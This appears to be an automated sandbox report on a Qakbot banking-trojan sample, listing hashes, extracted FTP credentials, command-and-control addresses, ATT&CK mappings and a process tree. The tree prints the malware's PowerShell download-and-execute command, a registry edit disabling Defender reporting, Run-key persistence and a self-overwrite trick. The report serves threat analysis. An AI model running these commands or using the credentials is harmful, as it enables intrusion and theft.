qakbot | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

General

Target

4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Size

616KB
MD5

adab2a637738b6780e74b74dcabbb96f
SHA1

0614b295d8f8486ea42c89be35b3e44926a943c0
SHA256

4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA512

72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

Score

10^/10

qakbot 1532427880 banker persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1

ps1.dropper

https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

qakbot

Version

322.368

Campaign

1532427880

Credentials

Protocol: ftp
Host:
37.60.244.211
Port:
21
Username:
[email protected]
Password:
4AsEzIaMwi2d

Protocol: ftp
Host:
198.38.77.162
Port:
21
Username:
[email protected]
Password:
kJm6DKVPfyiv

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
[email protected]
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
[email protected]
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
[email protected]
Password:
RoP4Af0RKAAQ74V

C2

216.218.74.196:443

185.219.83.73:443

50.198.141.161:2078

70.118.18.242:443

68.113.142.24:465

72.193.162.108:443

98.225.141.232:443

216.201.159.118:443

73.130.229.200:443

76.73.202.82:443

67.197.97.144:443

71.77.22.206:443

47.40.29.239:443

65.116.179.83:443

96.248.15.254:995

47.134.236.166:443

173.81.42.136:20

73.106.122.121:443

98.103.2.226:443

181.93.205.181:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

5 1172 powershell.exe
6 1172 powershell.exe
7 1172 powershell.exe
8 1172 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

crzupte.execrzupte.exe

pid process

1724 crzupte.exe
1196 crzupte.exe

flow	pid	process
5	1172	powershell.exe
6	1172	powershell.exe
7	1172	powershell.exe
8	1172	powershell.exe

pid	process
1724	crzupte.exe
1196	crzupte.exe

Loads dropped DLL 2 IoCs

Processes:

4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe

pid	process
892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows\CurrentVersion\Run\cnbbfsg = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crzupter\\crzupte.exe\""	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1316 PING.EXE

pid	process
1316	PING.EXE

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.execrzupte.exepowershell.execrzupte.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXEcmd.execonhost.exePING.EXE

pid	process
892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
1664	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
1664	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
1724	crzupte.exe
1172	powershell.exe
1196	crzupte.exe
1196	crzupte.exe
1948	explorer.exe
1948	explorer.exe
1128	taskhost.exe
1220	Dwm.exe
1268	Explorer.EXE
1312	cmd.exe
308	conhost.exe
1316	PING.EXE
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe
1948	explorer.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

crzupte.exe

pid process

1724 crzupte.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1172 powershell.exe

pid	process
1724	crzupte.exe

description	pid	process
Token: SeDebugPrivilege	1172	powershell.exe

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.execrzupte.execmd.exeexplorer.exe

description	pid	process	target process
PID 892 wrote to memory of 1664	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
PID 892 wrote to memory of 1664	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
PID 892 wrote to memory of 1664	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
PID 892 wrote to memory of 1664	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
PID 892 wrote to memory of 1724	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	crzupte.exe
PID 892 wrote to memory of 1724	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	crzupte.exe
PID 892 wrote to memory of 1724	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	crzupte.exe
PID 892 wrote to memory of 1724	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	crzupte.exe
PID 892 wrote to memory of 548	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	reg.exe
PID 892 wrote to memory of 548	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	reg.exe
PID 892 wrote to memory of 548	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	reg.exe
PID 892 wrote to memory of 548	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	reg.exe
PID 892 wrote to memory of 1172	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	powershell.exe
PID 892 wrote to memory of 1172	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	powershell.exe
PID 892 wrote to memory of 1172	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	powershell.exe
PID 892 wrote to memory of 1172	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	powershell.exe
PID 1724 wrote to memory of 1196	1724	crzupte.exe	crzupte.exe
PID 1724 wrote to memory of 1196	1724	crzupte.exe	crzupte.exe
PID 1724 wrote to memory of 1196	1724	crzupte.exe	crzupte.exe
PID 1724 wrote to memory of 1196	1724	crzupte.exe	crzupte.exe
PID 1724 wrote to memory of 1948	1724	crzupte.exe	explorer.exe
PID 1724 wrote to memory of 1948	1724	crzupte.exe	explorer.exe
PID 1724 wrote to memory of 1948	1724	crzupte.exe	explorer.exe
PID 1724 wrote to memory of 1948	1724	crzupte.exe	explorer.exe
PID 1724 wrote to memory of 1948	1724	crzupte.exe	explorer.exe
PID 892 wrote to memory of 1312	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	cmd.exe
PID 892 wrote to memory of 1312	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	cmd.exe
PID 892 wrote to memory of 1312	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	cmd.exe
PID 892 wrote to memory of 1312	892	4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe	cmd.exe
PID 1312 wrote to memory of 1316	1312	cmd.exe	PING.EXE
PID 1312 wrote to memory of 1316	1312	cmd.exe	PING.EXE
PID 1312 wrote to memory of 1316	1312	cmd.exe	PING.EXE
PID 1312 wrote to memory of 1316	1312	cmd.exe	PING.EXE
PID 1948 wrote to memory of 1128	1948	explorer.exe	taskhost.exe
PID 1948 wrote to memory of 1128	1948	explorer.exe	taskhost.exe
PID 1948 wrote to memory of 1128	1948	explorer.exe	taskhost.exe
PID 1948 wrote to memory of 1220	1948	explorer.exe	Dwm.exe
PID 1948 wrote to memory of 1220	1948	explorer.exe	Dwm.exe
PID 1948 wrote to memory of 1220	1948	explorer.exe	Dwm.exe
PID 1948 wrote to memory of 1268	1948	explorer.exe	Explorer.EXE
PID 1948 wrote to memory of 1268	1948	explorer.exe	Explorer.EXE
PID 1948 wrote to memory of 1268	1948	explorer.exe	Explorer.EXE
PID 1948 wrote to memory of 1312	1948	explorer.exe	cmd.exe
PID 1948 wrote to memory of 1312	1948	explorer.exe	cmd.exe
PID 1948 wrote to memory of 1312	1948	explorer.exe	cmd.exe
PID 1948 wrote to memory of 308	1948	explorer.exe	conhost.exe
PID 1948 wrote to memory of 308	1948	explorer.exe	conhost.exe
PID 1948 wrote to memory of 308	1948	explorer.exe	conhost.exe
PID 1948 wrote to memory of 1316	1948	explorer.exe	PING.EXE
PID 1948 wrote to memory of 1316	1948	explorer.exe	PING.EXE
PID 1948 wrote to memory of 1316	1948	explorer.exe	PING.EXE

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1268

C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
"C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:892

C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
"C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe" /C
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1664

C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1724

C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe" /C
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1196

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\ipdthpqrndvsmqnttfgguuqmj.txt'"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
PID:1316

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1220

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1128

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13846247831516998300-11375854551824567666-1445500240151860539714287427401005606822"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:308

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupt.dat
Filesize
92B

MD5
c8c163765674940da66be2b8e7449697

SHA1
86d26dac42b5bfb68ed992bbbead59cc5890803e

SHA256
7a32b89b011cd130e41d6f9f9d3bdc7fd79cbb7d5667ec39e42a326d35383596

SHA512
f5fdb504cfb74942c6f0433fceefa565458f62b9f9bb481372af87598f2d150cb2881e493bce09f235e233bbd47e8978956eb981c08a71d2ae39dc7d25670dd7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe
Filesize
616KB

MD5
adab2a637738b6780e74b74dcabbb96f

SHA1
0614b295d8f8486ea42c89be35b3e44926a943c0

SHA256
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

SHA512
72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe
Filesize
616KB

MD5
adab2a637738b6780e74b74dcabbb96f

SHA1
0614b295d8f8486ea42c89be35b3e44926a943c0

SHA256
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

SHA512
72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe
Filesize
616KB

MD5
adab2a637738b6780e74b74dcabbb96f

SHA1
0614b295d8f8486ea42c89be35b3e44926a943c0

SHA256
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

SHA512
72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe
Filesize
616KB

MD5
adab2a637738b6780e74b74dcabbb96f

SHA1
0614b295d8f8486ea42c89be35b3e44926a943c0

SHA256
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

SHA512
72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Crzupter\crzupte.exe
Filesize
616KB

MD5
adab2a637738b6780e74b74dcabbb96f

SHA1
0614b295d8f8486ea42c89be35b3e44926a943c0

SHA256
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4

SHA512
72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d

Download Submit
memory/308-139-0x0000000001BC0000-0x0000000001BEC000-memory.dmp

Filesize
176KB

Download
memory/308-131-0x0000000001BC0000-0x0000000001BEC000-memory.dmp

Filesize
176KB

Download
memory/548-77-0x0000000000000000-mapping.dmp

Download
memory/892-55-0x0000000000400000-0x000000000049E000-memory.dmp

Filesize
632KB

Download
memory/892-59-0x00000000001D0000-0x00000000001D6000-memory.dmp

Filesize
24KB

Download
memory/892-54-0x00000000755C1000-0x00000000755C3000-memory.dmp

Filesize
8KB

Download
memory/1128-114-0x0000000001D20000-0x0000000001D4C000-memory.dmp

Filesize
176KB

Download
memory/1128-105-0x0000000001D20000-0x0000000001D4C000-memory.dmp

Filesize
176KB

Download
memory/1128-107-0x0000000001D50000-0x0000000001D7D000-memory.dmp

Filesize
180KB

Download
memory/1172-78-0x0000000000000000-mapping.dmp

Download
memory/1172-97-0x000000000275B000-0x000000000277A000-memory.dmp

Filesize
124KB

Download
memory/1172-84-0x000000000275B000-0x000000000277A000-memory.dmp

Filesize
124KB

Download
memory/1172-82-0x0000000002754000-0x0000000002757000-memory.dmp

Filesize
12KB

Download
memory/1172-79-0x000007FEFBAF1000-0x000007FEFBAF3000-memory.dmp

Filesize
8KB

Download
memory/1172-81-0x000007FEF35E0000-0x000007FEF413D000-memory.dmp

Filesize
11.4MB

Download
memory/1172-83-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

Filesize
3.0MB

Download
memory/1172-93-0x0000000002754000-0x0000000002757000-memory.dmp

Filesize
12KB

Download
memory/1172-95-0x000000000275B000-0x000000000277A000-memory.dmp

Filesize
124KB

Download
memory/1172-96-0x0000000002754000-0x0000000002757000-memory.dmp

Filesize
12KB

Download
memory/1172-80-0x000007FEF4140000-0x000007FEF4B63000-memory.dmp

Filesize
10.1MB

Download
memory/1196-94-0x00000000002E0000-0x00000000002E6000-memory.dmp

Filesize
24KB

Download
memory/1196-86-0x0000000000000000-mapping.dmp

Download
memory/1220-140-0x0000000001C60000-0x0000000001C8C000-memory.dmp

Filesize
176KB

Download
memory/1220-115-0x0000000001C60000-0x0000000001C8C000-memory.dmp

Filesize
176KB

Download
memory/1268-120-0x00000000029D0000-0x00000000029FC000-memory.dmp

Filesize
176KB

Download
memory/1312-101-0x0000000000000000-mapping.dmp

Download
memory/1312-121-0x0000000000110000-0x0000000000138000-memory.dmp

Filesize
160KB

Download
memory/1312-123-0x0000000000140000-0x0000000000169000-memory.dmp

Filesize
164KB

Download
memory/1312-130-0x0000000000110000-0x0000000000138000-memory.dmp

Filesize
160KB

Download
memory/1316-102-0x0000000000000000-mapping.dmp

Download
memory/1316-137-0x0000000000210000-0x0000000000238000-memory.dmp

Filesize
160KB

Download
memory/1664-66-0x0000000000240000-0x0000000000246000-memory.dmp

Filesize
24KB

Download
memory/1664-60-0x0000000000000000-mapping.dmp

Download
memory/1724-76-0x0000000000230000-0x0000000000236000-memory.dmp

Filesize
24KB

Download
memory/1724-69-0x0000000000000000-mapping.dmp

Download
memory/1948-113-0x0000000000230000-0x000000000025F000-memory.dmp

Filesize
188KB

Download
memory/1948-100-0x0000000074351000-0x0000000074353000-memory.dmp

Filesize
8KB

Download
memory/1948-138-0x0000000000080000-0x00000000000E9000-memory.dmp

Filesize
420KB

Download
memory/1948-103-0x0000000000080000-0x00000000000E9000-memory.dmp

Filesize
420KB

Download
memory/1948-98-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads